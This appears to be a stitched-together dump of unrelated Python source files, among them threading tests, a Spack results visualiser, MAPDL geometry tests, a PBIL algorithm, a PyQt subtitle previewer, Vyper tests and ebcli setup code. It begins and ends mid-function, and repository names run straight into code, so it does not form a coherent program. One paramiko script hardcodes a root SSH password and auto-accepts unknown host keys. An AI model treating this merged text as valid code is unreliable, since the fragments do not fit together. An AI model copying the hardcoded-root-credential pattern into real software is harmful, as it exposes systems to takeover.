new_state.isContextState else self.states if new_state.isMultiState: if handle is None: # new state return new_state else: old_state = lookup.handle.getOne(handle) else: old_state = lookup.descriptorHandle.getOne(descriptorHandle) new_state.updateFromOtherContainer(old_state) return new_state def get_wf_age_stdev(self): means = [] stdevs = [] mins = [] maxs = [] for buf in self.rtBuffers.values(): age_data = buf.get_age_stdev() means.append(age_data.mean_age) stdevs.append(age_data.stdev) mins.append(age_data.min_age) maxs.append(age_data.max_age) return _AgeData(mean(means), mean(stdevs), min(mins), max(maxs)) tests/test_thread_python_exit.py import time import continuous_threading def test_thread(): class Thread(continuous_threading.Thread): def _run(self, *args, **kwargs): print('here') th = Thread() th.start() time.sleep(0.1) def test_continuous(): class CountingThread(continuous_threading.ContinuousThread): def __init__(self): super(CountingThread, self).__init__() self.counter = 0 def _run(self): self.counter += 1 th = CountingThread() th.start() time.sleep(0.1) print('Iterations', th.counter) def test_pausable(): class PausableCountingThread(continuous_threading.PausableThread): def __init__(self): super(PausableCountingThread, self).__init__() self.counter = 0 def _run(self): self.counter += 1 th = PausableCountingThread() th.start() time.sleep(0.1) th.stop() print('Iterations (paused)', th.counter) th.start() time.sleep(0.1) print('Iterations', th.counter) def test_operation(): class SetValueThread(continuous_threading.OperationThread): def __init__(self): super(SetValueThread, self).__init__() self.value = 0 def _run(self, data, *args, **kwargs): self.value = data th = SetValueThread() th.start() time.sleep(0.1) assert th.value == 0 th.add_data(1) time.sleep(0.1) assert th.value == 1 any(th.add_data(i) for i in range(20000)) # th.add_data returns None, so the entire range is executed # time.sleep(0.01) # Not needed print('The set value', th.value, '| remaining queue size:', th.get_queue_size()) # DO NOT STOP, CLOSE, OR, JOIN THE THREAD if __name__ == '__main__': # Run one option at a time import sys # Default test run # run_test = test_thread # run_test = test_continuous # run_test = test_pausable run_test = test_operation if len(sys.argv) > 1: value = str(sys.argv[1]).lower() if value == '0' or value == 'thread': run_test = test_thread elif value == '1' or 'continuous' in value: run_test = test_continuous elif value == '2' or 'paus' in value: run_test = test_pausable elif value == '3' or 'op' in value: run_test = test_operation run_test() # You should observe that python.exe is no longer a running process when the program finishes. # exit code should be 0 org_to_excel_dashboards.py0 # from openpyxl import load_workbook # from dashboard.my_secrets import REGRESSION_DEVEXT_DBQA_GIS # # # def get_items_from_folder( # gis_obj, folder, item_types=None # ) -> list: # folder=None returns the root folder # items = gis_obj.users.me.items(folder=folder) # # if item_types: # items = [item for item in items if item.type in item_types] # return items # # return items # # # if __name__ == "__main__": # # WB = load_workbook("name.xlsx") # WS = WB.active # # FOLDERS = REGRESSION_DEVEXT_DBQA_GIS.users.me.folders # print(f"I have {len(FOLDERS)} folders to work on") # # ALL_ITEMS = [] # for FOLDER_INDEX, FOLDER in enumerate(FOLDERS): # if FOLDER["title"] == "_Trash_Can": # continue # print(f"I am working on Folder {FOLDER_INDEX} with name, {FOLDER['title']}") # FOLDER_ITEMS = get_items_from_folder( # gis_obj=REGRESSION_DEVEXT_DBQA_GIS, folder=FOLDER, item_types=["Dashboard"] # ) # for ITEM in FOLDER_ITEMS: # try: # if ITEM.get_data() is not None: # ITEMS_WITH_FOLDER_AND_VERSION = ( # ITEM, # FOLDER["title"], # ITEM.get_data()["version"], # ) # ALL_ITEMS.append( # ITEMS_WITH_FOLDER_AND_VERSION # ) # I think this is in the wrong spot # except Exception as e: # print(e) # # for ITEM_INDEX, row in enumerate( # WS.iter_rows(min_row=2, max_row=len(ALL_ITEMS) + 1) # ): # row[0].value = ALL_ITEMS[ITEM_INDEX][0].title # row[1].value = ALL_ITEMS[ITEM_INDEX][0].id # row[2].value = ALL_ITEMS[ITEM_INDEX][1] # folder # row[3].value = ALL_ITEMS[ITEM_INDEX][0].type # row[4].value = ALL_ITEMS[ITEM_INDEX][2] # # WB.save("name.xlsx") #!/usr/bin/env python # Usage: # starting with a results file in your ~/.spack/analyzers/spack-monitor, run as follows: # python visualize-predictions.py ~/.spack/spack-monitor/analysis/curl/symbolator-predictions.json # Note the directory name is the package being spliced import numpy as np import seaborn as sns import matplotlib.pyplot as plt import jsonschema import shutil import pandas import sys import json import os # Also validate to ensure we have the right format from spliced.schemas import spliced_result_schema here = os.environ.get("GITHUB_WORKSPACE") or os.getcwd() def write_json(obj, filename): with open(filename, "w") as fd: fd.write(json.dumps(obj, indent=4)) def read_json(filename): with open(filename, "r") as fd: content = json.loads(fd.read()) return content template = """--- title: Package %s Experiment %s results categories: packages tags: [package] permalink: /results/%s/%s/ %s maths: 1 toc: 1 --- """ def plot_clustermap(df, save_to=None): sns.set_theme(style="white") f, ax = plt.subplots(figsize=(30, 30)) # Generate a custom diverging colormap cmap = sns.color_palette() # cmap = sns.diverging_palette(230, 20, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio p = sns.clustermap( df, cmap=cmap, center=0, square=True, linewidths=0.5, cbar_kws={"shrink": 0.5} ) # used for heatmap # p.tick_params(labelsize=5) # p.set_xlabel("Splice", fontsize=12) # p.set_ylabel("Binary", fontsize=12) if save_to: plt.savefig(save_to) return plt def plot_heatmap(df, save_to=None): sns.set_theme(style="white") f, ax = plt.subplots(figsize=(10, 12)) # Generate a custom diverging colormap cmap = sns.color_palette() # cmap = sns.diverging_palette(230, 20, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio p = sns.heatmap( df, cmap=cmap, center=0, square=True, linewidths=0.5, cbar_kws={"shrink": 0.5} ) # used for heatmap # p.tick_params(labelsize=5) # p.set_xlabel("Splice", fontsize=12) # p.set_ylabel("Binary", fontsize=12) if save_to: plt.savefig(save_to) return plt def main(pkg_dir): if not os.path.exists(pkg_dir): sys.exit("Cannot find %s" % pkg_dir) # There are TWO levels of informatoin # 1. The top level package / splice "was it successful or not (and if not why) # 2. The second level specific results for a splice "is this predicted to work (or not)" # For now I'm going to try and visualize the top, and then present the next levels in a table # We will create rows / cols for each splice rows = set() # package cols = set() # splices testers = set() # Unique result types result_types = set() package = os.path.basename(pkg_dir) # assumes same command across commands = set() # Results will be a table of results for each predictor results = {"failed": []} # Assemble experiments for pkg in os.listdir(os.path.abspath(pkg_dir)): # These are matrix entries # curl-7.53.1-splice-zlib-with-zlib-experiment-curl for experiment in os.listdir(os.path.join(pkg_dir, pkg)): for result_file in os.listdir(os.path.join(pkg_dir, pkg, experiment)): result_file = os.path.join(pkg_dir, pkg, experiment, result_file) data = read_json(result_file) try: jsonschema.validate(data, schema=spliced_result_schema) except: print( "%s is not valid for the current result schema." % result_file ) continue for datum in data: # Top level results for the visualization go here cols.add(datum.get("splice")) rows.add(datum.get("package")) result_types.add(datum.get("result")) # If we don't have predictions, add to "failed" tester has_predictions = False for tester, resultlist in datum["predictions"].items(): if not resultlist: continue testers.add(tester) if tester not in results: results[tester] = [] # We can't assume the testers have the exact same testing set (but they can) for res in resultlist: has_predictions = True # We add binaries/libs that we have predictions for results[tester].append( { "binary": res.get("binary"), "lib": res.get("lib"), "prediction": res.get("prediction"), "message": res.get("message"), "return_code": res.get("return_code"), "command": res.get("command"), "splice": datum.get("splice"), "package": datum.get("package"), "result": datum.get("result"), } ) if not has_predictions: results["failed"].append( { "binary": None, "lib": None, "prediction": None, "message": None, "return_code": None, "command": None, "splice": datum.get("splice"), "package": datum.get("package"), "result": datum.get("result"), } ) print("Found %s testers: %s" % (len(testers), " ".join(testers))) # Create top level data frame df = pandas.DataFrame(0, index=rows, columns=cols) # Assign each outcome a number outcomes = {result_type: i + 1 for i, result_type in enumerate(result_types)} # Populate outcomes for pkg in os.listdir(os.path.abspath(pkg_dir)): for experiment in os.listdir(os.path.join(pkg_dir, pkg)): for result_file in os.listdir(os.path.join(pkg_dir, pkg, experiment)): result_file = os.path.join(pkg_dir, pkg, experiment, result_file) data = read_json(result_file) try: jsonschema.validate(data, schema=spliced_result_schema) except: continue for datum in data: # Top level results for the visualization go here colname = datum.get("splice") rowname = datum.get("package") outcome = outcomes[datum.get("result")] df.loc[rowname, colname] = outcome # Save results to file under docs experiment = experiment.split("-")[0] result_dir = os.path.join(here, "docs", "_results", package, experiment) if not os.path.exists(result_dir): os.makedirs(result_dir) listing = "" # Save the json to file write_json(results, os.path.join(result_dir, "results-list.json")) df.to_json(os.path.join(result_dir, "results-table.json")) write_json(outcomes, os.path.join(result_dir, "outcomes.json")) # Plot basics no_results = False if df.shape[1] == 0: print("Warning - empty data frame! No results to show for %s" % pkg_dir) no_results = True elif df.shape[1] > 1: save_to = os.path.join(result_dir, "%s-%s.pdf" % (experiment, package)) fig = plot_clustermap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.png" % (experiment, package)) fig = plot_clustermap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.svg" % (experiment, package)) fig = plot_clustermap(df, save_to) else: save_to = os.path.join(result_dir, "%s-%s.pdf" % (experiment, package)) fig = plot_heatmap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.png" % (experiment, package)) fig = plot_heatmap(df, save_to) save_to = os.path.join(result_dir, "%s-%s.svg" % (experiment, package)) fig = plot_heatmap(df, save_to) # Save the filenames for images if not no_results: listing += "png: %s-%s.png\n" % (experiment, package) listing += "svg: %s-%s.svg\n" % (experiment, package) listing += "pdf: %s-%s.pdf\n" % (experiment, package) # And the entry for the results listing += "results: results-list.json\n" listing += "outcomes: %s\n" % outcomes # Generate a markdown for each content = template % (package, experiment, package, experiment, listing) md = os.path.join(result_dir, "index.md") with open(md, "w") as fd: fd.write(content) if __name__ == "__main__": if len(sys.argv) < 2: sys.exit( "Please provide the path to a package folder: python visualize-predictions.py artifacts/curl" ) main(sys.argv[1]) # -*- coding: UTF-8 -*- import paramiko ,color ,sys reload(sys) sys.setdefaultencoding('GBK') col = color.Color() def changetime(): print u"你将改变测试环境(192.168.0.22)的日期。" s = paramiko.SSHClient() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect('192.168.0.22' ,22 ,'root' ,'fgoods.com') stdin, stdout, stderr = s.exec_command('ping -c 2 192.168.0.22') print stdout.read() if __name__ == '__main__': changetime()from collections import namedtuple from itertools import combinations from math import isclose, pi, sqrt import pytest PointTrioAngle = namedtuple("PointTrioAngle", ["point1", "point2", "vertex", "angle"]) Triangle = namedtuple("Triangle", ["point1", "point2", "point3", "area"]) Line = namedtuple("Line", ["point1", "point2", "distance"]) angles = [ PointTrioAngle((1, 0, 0), (0, 1, 0), (0, 0, 0), pi * 0.5), PointTrioAngle((1, 0, 0), (0, 0, 1), (0, 0, 0), pi * 0.5), PointTrioAngle((0, 0, 1), (0, 1, 0), (0, 0, 0), pi * 0.5), PointTrioAngle((1, 1, 0), (0, 1, 0), (0, 0, 0), pi * 0.25), PointTrioAngle((1, 1, 1), (0, 0, 0), (0, 0, 0), 0.0), PointTrioAngle((1, 1, 1), (1, 1, 1), (0, 0, 0), 0.0), PointTrioAngle((1, 0, 0), (-1, 0, 0), (0, 0, 0), pi), PointTrioAngle((1, 0, 0), (-1, -1, 0), (0, 0, 0), pi * 0.75), PointTrioAngle((0, 0, 0), (0, 0, 0), (0, 0, 0), 0.0), ] triangles = [ Triangle((1, 0, 0), (0, 0, 0), (0, 1, 0), 0.5), Triangle((1, 0, 0), (0, 0, 0), (0, 0.5, 0), 0.25), Triangle((1, 0, 0), (0, 0, 0), (1, 0, 0), 0.0), Triangle((0, 0, 0), (0, 0, 0), (0, 0, 0), 0.0), Triangle((1, 0, 0), (-1, 0, 0), (0, 1, 0), 1.0), Triangle((1, 0, 0), (0, 0, 0), (0, 1, 0), 0.5), Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038), ] lines = [ Line((0, 0, 0), (1, 0, 0), 1.0), Line((0, 0, 0), (1, 1, 0), sqrt(2.0)), Line((0, 0, -2), (0, 0, 0), 2.0), Line((0, 0, 0.0), (0, 0, 0), 0.0), ] class TestAngleQueries: @pytest.mark.parametrize("coords", angles) def test_anglen(self, query, mapdl, cleared, coords: PointTrioAngle): n1 = mapdl.n(1, *coords.vertex) n2 = mapdl.n(2, *coords.point1) n3 = mapdl.n(3, *coords.point2) assert isclose(query.anglen(n1, n2, n3), coords.angle) @pytest.mark.parametrize("coords", angles) def test_anglek(self, query, mapdl, cleared, coords: PointTrioAngle): k1 = mapdl.k(1, *coords.vertex) k2 = mapdl.k(2, *coords.point1) k3 = mapdl.k(3, *coords.point2) assert isclose(query.anglek(k1, k2, k3), coords.angle) class TestTriangleAreaQueries: def test_areand_order_invariant(self, mapdl, cleared): triangle = Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038) n1 = mapdl.n(1, *triangle.point1) n2 = mapdl.n(2, *triangle.point2) n3 = mapdl.n(3, *triangle.point3) for combo in combinations([n1, n2, n3], 3): area = mapdl.queries.areand(*combo) print(combo) assert isclose(area, triangle.area) @pytest.mark.parametrize("triangle", triangles) def test_areand_various_triangles(self, mapdl, cleared, triangle: Triangle): n1 = mapdl.n(1, *triangle.point1) n2 = mapdl.n(2, *triangle.point2) n3 = mapdl.n(3, *triangle.point3) area = mapdl.queries.areand(n1, n2, n3) assert isclose(area, triangle.area) def test_areakp_order_invariant(self, mapdl, cleared): triangle = Triangle((1, 0, 0), (0, 1, 0), (0, 0, 1), 0.8660254038) k1 = mapdl.k(1, *triangle.point1) k2 = mapdl.k(2, *triangle.point2) k3 = mapdl.k(3, *triangle.point3) for combo in combinations([k1, k2, k3], 3): area = mapdl.queries.areakp(*combo) assert isclose(area, triangle.area) @pytest.mark.parametrize("triangle", triangles) def test_areakp_various_triangles(self, mapdl, cleared, triangle: Triangle): k1 = mapdl.k(1, *triangle.point1) k2 = mapdl.k(2, *triangle.point2) k3 = mapdl.k(3, *triangle.point3) area = mapdl.queries.areakp(k1, k2, k3) assert isclose(area, triangle.area) class TestDistanceQueries: def test_distkp_order_invariance(self, mapdl, cleared): line = Line((0, 0, 0), (1, 0, 0), 1.0) k1 = mapdl.k(1, *line.point1) k2 = mapdl.k(2, *line.point2) assert mapdl.queries.distkp(k1, k2) == mapdl.queries.distkp(k2, k1) def test_distnd_order_invariance(self, mapdl, cleared): line = Line((0, 0, 0), (1, 0, 0), 1.0) n1 = mapdl.n(1, *line.point1) n2 = mapdl.n(2, *line.point2) assert mapdl.queries.distnd(n1, n2) == mapdl.queries.distnd(n2, n1) @pytest.mark.parametrize("line", lines) def test_distnd(self, mapdl, cleared, line: Line): n1 = mapdl.n(1, *line.point1) n2 = mapdl.n(2, *line.point2) distance = mapdl.queries.distnd(n1, n2) assert isclose(distance, line.distance) @pytest.mark.parametrize("line", lines) def test_distkp(self, mapdl, cleared, line: Line): k1 = mapdl.k(1, *line.point1) k2 = mapdl.k(2, *line.point2) distance = mapdl.queries.distkp(k1, k2) assert isclose(distance, line.distance) import json import string import random def getlistfromfile(file_path): extractedlist = [] with open(file_path) as file_with_list: for listline in file_with_list: extractedlist.append(listline.rstrip()) return extractedlist def random_generator_upper(min_char, max_char, chars2=string.ascii_uppercase + string.digits): uppercharz = string.ascii_uppercase + "_" prefix = "".join(random.choice(uppercharz) for x in range(1)) suffix = "".join(random.choice(chars2) for x in range(random.randint(min_char, max_char))) return prefix + suffix def dedup(seq): deduped_seq = [] seen = set() for list_elem in seq: list_elem_added = False if list_elem['theformer'] not in seen: seen.add(list_elem['theformer']) list_elem_added = True if list_elem_added: deduped_seq.append(list_elem) return deduped_seq def loadjsonfile(source_json_file): with open(source_json_file) as json_data: unsorted_replacers = json.load(json_data) sorted_replacers = sorted(unsorted_replacers, key=lambda x: len(x['theformer']), reverse=True) return dedup(sorted_replacers) def savejsonfile(new_file_name, json_data): with open(new_file_name, 'w') as outfile: json.dump(json_data, outfile) benjeffery/mccortex #!/usr/bin/env python from __future__ import print_function try: input = raw_input except: pass import sys import csv import re # # Read in distance matrices between raw, clean and perfect graphs for k=... # output table: kmer,nkmers,raw_nkmers,raw_nreal,clean_nkmers,clean_nreal # def usage(argv,err=None): if err is not None: print(err,file=sys.stderr) print("usage: python",argv[0]," ...",file=sys.stderr) exit(-1) def load_csv(csvpath): m = [] with open(csvpath) as csvpath: csvreader = csv.reader(csvpath, delimiter='\t', quotechar='"') next(csvreader) # skip first row (column headers) for row in csvreader: m.append([ 0 if x == '.' else int(x) for x in row[1:]]) return m def main(argv): if len(argv) <= 1: usage(argv) sep = ',' print("# Number of kmers in the perfect, raw and cleaned graphs") print("# _nreal is the number of real kmers in the raw/cleaned graph") print("# raw_errs, clean_errs are the fraction of error kmers in each graph") print("# frac_remove_errs is the fraction of kmers removed that were seqn errs") print(sep.join(["kmer","nkmers", "raw_nkmers","raw_nreal", "clean_nkmers","clean_nreal", "raw_errs","clean_errs", "frac_remove_errs"])) for f in argv[1:]: match = re.search('k([0-9]+)', f) k = match.group(1) m = load_csv(f) nkmers = m[2][2] raw_nkmers,raw_nreal = m[0][0],m[0][2] clean_nkmers,clean_nreal = m[1][1],m[1][2] raw_errs = (raw_nkmers-raw_nreal)/float(raw_nkmers) clean_errs = (clean_nkmers-clean_nreal)/float(clean_nkmers) kmers_removed = raw_nkmers-clean_nkmers real_kmers_removed = raw_nreal-clean_nreal frac_remove_errs = 1.0 - float(real_kmers_removed)/kmers_removed r = [k,m[2][2],m[0][0],m[0][2],m[1][1],m[1][2], "%.5f"%raw_errs,"%.5f"%clean_errs,"%.5f"%frac_remove_errs] print(sep.join([str(x) for x in r])) if __name__ == '__main__': main(sys.argv) import argparse from data_preproc import fast_preproc def main(args): fast_preproc(args.in_path, args.out_path, args.lang) if __name__ == "__main__": parser = argparse.ArgumentParser( description='data for kor_summ' ) parser.add_argument('--in_path', required=True, help='root of input data') parser.add_argument('--out_path', required=True, help='path of outputs') parser.add_argument('--lang', type=str, action='store', default='en', help='language articles written in') args = parser.parse_args() main(args) ## python temp_preproc.py --in_path=../test_path/in/ --out_path=../test_path/out/ --lang=ko # python3 temp_preproc.py --in_path=/content/fast_abs_rl/corea_dailynews/finished_files/news_train_mini.json \ # --out_path=/content/fast_abs_rl/corea_dailynews/finished_files/train --lang=ko# Code from Chapter 10 of Machine Learning: An Algorithmic Perspective (2nd Edition) # by (http://stephenmonika.net) # You are free to use, change, or redistribute the code in any way you wish for # non-commercial purposes, but please maintain the name of the original author. # This code comes with no warranty of any kind. # , 2008, 2014 # The Population Based Incremental Learning algorithm # Comment and uncomment fitness functions as appropriate (as an import and the fitnessFunction variable) import pylab as pl import numpy as np # import fourpeaks as fF def PBIL(): pl.ion() populationSize = 100 stringLength = 20 eta = 0.005 # fitnessFunction = 'fF.fourpeaks' fitnessFunction = 'fF.knapsack' p = 0.5 * np.ones(stringLength) best = np.zeros(501, dtype=float) for count in range(501): # Generate samples population = np.random.rand(populationSize, stringLength) for i in range(stringLength): population[:, i] = np.where(population[:, i] < p[i], 1, 0) # Evaluate fitness fitness = eval(fitnessFunction)(population) # Pick best best[count] = np.max(fitness) bestplace = np.argmax(fitness) fitness[bestplace] = 0 secondplace = np.argmax(fitness) # Update vector p = p * (1 - eta) + eta * ((population[bestplace, :] + population[secondplace, :]) / 2) if (np.mod(count, 100) == 0): print(count, best[count]) pl.plot(best, 'kx-') pl.xlabel('Epochs') pl.ylabel('Fitness') pl.show() # print p PBIL() tb365/mcclient_python1-10 from yunionclient.common import base class SSHRelayManager(base.Manager): service_type = 'sshrelay' def get_connections(self): resp, body = self.json_request('GET', r'/ssh/connections') return body['connections'] shreyassks/Text-Similarity-App-GKEGKE-engine/app/__init__.py # -*- coding: utf-8 -*- from flask import Flask import google.cloud.logging import logging client = google.cloud.logging.Client() client.setup_logging() app = Flask(__name__) if app.config["ENV"] == "production": app.config.from_object("config.ProductionConfig") else: app.config.from_object("config.DevelopmentConfig") print("Environment in use :- ", str(app.config["ENV"])) from app import main 10-100 """ Initial history Revision ID: 3d0b226940eb Revises: """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = '3d0b226940eb' down_revision = '' branch_labels = None depends_on = None def upgrade(): op.create_table('label_history', sa.Column('id', sa.Integer(), nullable=False), sa.Column('label_name', sa.String(), nullable=True), sa.Column('label_state_machine', sa.String(), nullable=True), sa.Column('created', sa.DateTime(), nullable=True), sa.Column('forced', sa.Boolean(), nullable=True), sa.Column('old_state', sa.String(), nullable=True), sa.Column('new_state', sa.String(), nullable=True), sa.ForeignKeyConstraint(['label_name', 'label_state_machine'], ['labels.name', 'labels.state_machine'], ), sa.PrimaryKeyConstraint('id'), ) def downgrade(): op.drop_table('label_history') """ Copyright 2019 Samsung SDS Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from brightics.function.clustering.agglomerative_clustering import agglomerative_clustering from brightics.common.datasets import load_iris import unittest import pandas as pd import numpy as np class AgglomerativeClustering(unittest.TestCase): def setUp(self): print("*** Aggromerative UnitTest Start ***") self.testdata = load_iris() def tearDown(self): print("*** Aggromerative UnitTest End ***") def test(self): ac_train = agglomerative_clustering(self.testdata, input_cols=['sepal_length', 'sepal_width', 'petal_length', 'petal_width'], n_clusters=3) labels = ac_train['out_table']['prediction'] np.testing.assert_array_equal(labels, [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 2, 2, 2, 2, 0, 2, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 2, 0, 2, 0, 2, 0, 2, 2, 0, 0, 2, 2, 2, 2, 2, 0, 0, 2, 2, 2, 0, 2, 2, 2, 0, 2, 2, 2, 0, 2, 2, 0]) TFarla/subs2srs-cross-platformsubs2srs/gui/models/preview_model.py import re from subs2srs.gui.globalobject import GlobalObject from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtCore import * from subs2srs.core.extractor import Extractor from subs2srs.core.subtitle import Subtitle from subs2srs.gui.preview import Preview from subs2srs.gui.state import State, StatePreview from typing import List from subs2srs.gui.main_widget import MainWidget from subs2srs.core.preview_item import PreviewItem from PyQt5.QtMultimedia import QSoundEffect, QSound, QAudioFormat, QAudioOutput from subs2srs.gui.audio import Audio class PreviewModel: def __init__(self, app: QMainWindow, state: State): super().__init__() self._app = app self._state = state GlobalObject().addEventListener("preview", self.doPreview) GlobalObject().addEventListener("backToMain", self.toMain) GlobalObject().addEventListener("previewSelectionChange", self.changeSelection) GlobalObject().addEventListener("previewDeactivate", self.inactivateLines) GlobalObject().addEventListener("previewActivate", self.activateLines) GlobalObject().addEventListener("previewSelectAll", self.selectAllPreview) GlobalObject().addEventListener("previewSelectNone", self.selectNonePreview) GlobalObject().addEventListener("previewSelectInvert", self.selectInvertPreview) GlobalObject().addEventListener("previewAdio", self.playAudio) def table(self): preview_table: QTableWidget = self._app.findChild( QTableWidget, "Preview.Table") if not preview_table: return None return preview_table @pyqtSlot() def playAudio(self, event): preview_table = self.table() index = preview_table.selectedIndexes() row = 0 if index: row = index[0].row() item = self._state.preview.items[row] start = item.from_time / 1000 audio_bytes = self._extractor.get_audio( start, item.end_time / 1000) if self._state.preview.audio: self._state.preview.audio.stop() audio = Audio(audio_bytes) self._state.preview.audio = audio audio.play() @pyqtSlot() def selectInvertPreview(self, event): preview_table = self.table() if preview_table is None: return items = preview_table.children() row_count = preview_table.rowCount() col_count = preview_table.columnCount() i = 0 while i < row_count: j = 0 while j < col_count: item: QTableWidgetItem = preview_table.item(i, j) item.setSelected(not item.isSelected()) j = j + 1 i = i + 1 @pyqtSlot() def selectNonePreview(self, event): preview_table = self.table() if preview_table is None: return preview_table.clearSelection() @pyqtSlot() def selectAllPreview(self, event): preview_table = self.table() if preview_table is None: return preview_table.selectAll() @pyqtSlot() def inactivateLines(self, event): preview_table = self.table() if preview_table is None: return for i in preview_table.selectedIndexes(): i: QModelIndex self.setInactive(preview_table, i.row(), i.column()) self.updateActiveLineCount() def setInactive(self, preview_table, row_index, column_index): self._state.preview.inactive_items.add(row_index) item = preview_table.item(row_index, column_index) item.setBackground(Qt.darkRed) f = item.font() f.setStrikeOut(True) item.setFont(f) def updateActiveLineCount(self): active_label: QLabel = self._app.findChild( QLabel, "Preview.Active.Value") inactive_label: QLabel = self._app.findChild( QLabel, "Preview.Inactive.Value") inactive_count = len(self._state.preview.inactive_items) active = str(len(self._state.preview.items) - inactive_count) active_label.setText(active) inactive_label.setText(str(inactive_count)) @pyqtSlot() def activateLines(self, event): preview_table = self.table() if preview_table is None: return for i in preview_table.selectedIndexes(): i: QModelIndex index = i.row() if index in self._state.preview.inactive_items: self._state.preview.inactive_items.remove(index) item: QTableWidgetItem = preview_table.item(index, i.column()) item.setBackground(QBrush()) f = item.font() f.setStrikeOut(False) item.setFont(f) self.updateActiveLineCount() @pyqtSlot() def changeSelection(self, event): def chunks(lst, n): """Yield successive n-sized chunks from lst.""" for i in range(0, len(lst), n): yield lst[i:i + n] preview_table = self.table() if preview_table is None: return rows = chunks(preview_table.selectedItems(), preview_table.columnCount()) for row in rows: row: List[QTableWidgetItem] index = preview_table.selectedIndexes()[0] self.updateDetails(index.row()) def updateDetails(self, active_row_index): items = self._state.preview.items if len(items) > 0: item: PreviewItem = items[active_row_index] snapshot1: QTextEdit = self._app.findChild(QObject, "PreviewSub1") snapshot1.setText(item.target_sub) if item.native_sub: snapshot2: QTextEdit = self._app.findChild( QObject, "PreviewSub2") snapshot2.setText(item.native_sub) output = self._extractor.get_snapshot(item.from_time_seconds()) # TODO: update snapshot on different thread so it's non blocking l: QLabel = self._app.findChild(QLabel, "PreviewSnapshot") p = QPixmap() p.loadFromData(output) l.setPixmap(p) @pyqtSlot() def toMain(self, event): self._state.preview = StatePreview() self._app.setCentralWidget(MainWidget()) @pyqtSlot() def doPreview(self, event): self._state.preview = StatePreview() native_file = None if self._state.sub2_file: native_file = Subtitle(self._state.sub2_file) self._extractor = Extractor( media_file=self._state.video_file, target_sub=Subtitle(self._state.sub1_file), native_sub=native_file ) items = list(self._extractor.preview()) self._state.preview.items = items self._state.preview.inactive_items.add(1) preview = Preview(items) self._app.setCentralWidget(preview) self.updateDetails(0) self._app.updateGeometry() preview_table = self.table() for i, item in enumerate(items): item: PreviewItem sub = item.target_sub if not is_good_japanese(sub): self.setRowInactive(preview_table, i) self.updateActiveLineCount() def setRowInactive(self, preview_table, row_index): for i in range(preview_table.columnCount()): self.setInactive(preview_table, row_index, i) def is_good_japanese(text: str): # ( # ) # remove: 。♪♪~ # if len(text) < 6: # return False if not is_japanese(text): return False clean = re.sub(r'(.*)', '', text).strip() clean = re.sub(sound_re, '', clean).strip() if not is_min_length(clean): return False if too_much_katakana(clean): return False if is_sung(clean): return False return True kanji_regex = re.compile('([一-龯])') kana_regex = re.compile('([ぁ-んァ-ン])') japanese_regex = re.compile('([一-龯ぁ-んァ-ン])') n_ja_re = re.compile('([^一-龯ぁ-んァ-ン])') full_width_katakana_regex = re.compile('([ァ-ン])') half_katakana_re = re.compile('([ァ-ン゙゚])') sound_re = re.compile('(\(.*[音声]\))') def is_japanese(text: str): matches = re.search(japanese_regex, text) return not matches is None def is_min_length(text: str): kanji_match = re.findall(kanji_regex, text) if kanji_match: return len(text) > 6 else: return len(text) > 8 def is_sung(text: str): return text[0] == "・" def too_much_katakana(text: str): n = re.sub(n_ja_re, '', text) n = n.replace(' ', '') n = n.replace(' ', '') n = n.replace('!', '') n = n.replace('。', '') n = re.sub(full_width_katakana_regex, '', n) n = re.sub(half_katakana_re, '', n) return len(n) < 4 tests/parser/syntax/test_keccak256.py import pytest from pytest import ( raises, ) from vyper import ( compiler, ) from vyper.exceptions import ( TypeMismatch, ) type_fail_list = [ """ @public def foo(): x: bytes32 = keccak256(3) """ ] @pytest.mark.parametrize('bad_code', type_fail_list) def test_block_type_fail(bad_code): with raises(TypeMismatch): compiler.compile_code(bad_code) valid_list = [ """ @public def foo(): x: bytes32 = keccak256("moose") """, """ @public def foo(): x: bytes32 = keccak256(0x1234567890123456789012345678901234567890123456789012345678901234) """ ] @pytest.mark.parametrize('good_code', valid_list) def test_block_success(good_code): assert compiler.compile_code(good_code) is not None # Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. import os import sys import logging import traceback from argparse import ArgumentTypeError from botocore.compat import six from ebcli.lib.aws import TooManyPlatformsError from cement.core.exc import CaughtSignal from ebcli.core import io from ebcli.objects.exceptions import ( ConnectionError, NoEnvironmentForBranchError, InvalidStateError, NotInitializedError, NoSourceControlError, NoRegionError, EBCLIException ) from ebcli.resources.strings import strings iteritems = six.iteritems def fix_path(): parent_folder = os.path.dirname(__file__) parent_dir = os.path.abspath(parent_folder) while not parent_folder.endswith('ebcli'): parent_folder = os.path.dirname(parent_folder) parent_dir = os.path.abspath(parent_folder) vendor_dir = os.path.join(parent_dir, 'bundled') sys.path.insert(0, vendor_dir) fix_path() def run_app(app): 